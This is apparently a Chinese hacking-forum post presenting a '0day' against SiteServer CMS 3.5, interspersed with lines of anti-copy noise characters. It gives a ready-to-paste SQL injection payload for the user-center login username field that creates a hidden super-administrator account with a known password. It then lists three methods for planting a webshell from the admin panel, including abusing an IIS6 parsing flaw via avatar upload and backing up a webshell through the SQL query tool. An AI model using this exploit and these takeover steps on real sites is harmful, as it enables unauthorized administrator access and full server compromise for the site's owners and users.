SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
- A( E% Y, u. v$ m. @3 t+ S4 v# o2 v
stieserver官网:www.siteserver.cn
6 e( v0 A) m. l  F- ~

2 E! n( N2 m- F+ q! x+ ^) H/ s
6 f$ D- |% b, Q- x- a$ ]9 UEXP:
5 T# d! C) Y* k* d/ i
直接访问UserCenter/login.aspx
! Q# }+ y2 P8 {8 i1 E# v
- l0 N. p, [' w) Q) g' J2 E
1 s$ \3 M: @, Y! s) W
用户名处输入：
9 k/ }  c: G1 _% J7 h! `' v
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
7 h& a4 Y# n! U1 K+ M7 c- @* n
5 S( f3 |/ b, t0 C( ~' t, p

- {, W$ w; L- M' X" a0 G密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
1 G6 V# {5 h6 F. g, h# n0 X
5 V6 `7 ?: v9 d

' |2 L, h! L& h3 W6 j; x7 z之后再访问后台SiteServer/login.aspx用插入的用户登陆


- C* |( L& V7 g
后台拿webshell的三种方法：

5 f9 e' u+ G7 p& Z一、
9 L" r; f, |9 @  v/ I5 W
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
  i0 m7 T- q0 ?5 w
) ^1 R8 ]  k- d% |& E+ E- [( [, n% ]2 z二、
: L! _: M/ a: Y* y& P0 u
, M% a! M0 e$ y' Z成员权限-》添加用户-》用户名为：1.asp

. m, _% I: v8 B( D$ F( Mhttp://127.0.0.1/usercenter/

1 r- ^5 s# O. r0 j7 x, M用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
" F) A' N9 m7 \, o6 v4 z( w1 ?
  p  o) i: B; M+ A9 l/ z) {) t7 L（ps：后台添加用户时不会验证是否含有非法字符）
7 V/ k/ u% }5 `  Z- ^
三、
$ B1 l# O. H4 a+ p/ a6 l
1 W) e; f# I9 Y& p8 C8 r系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。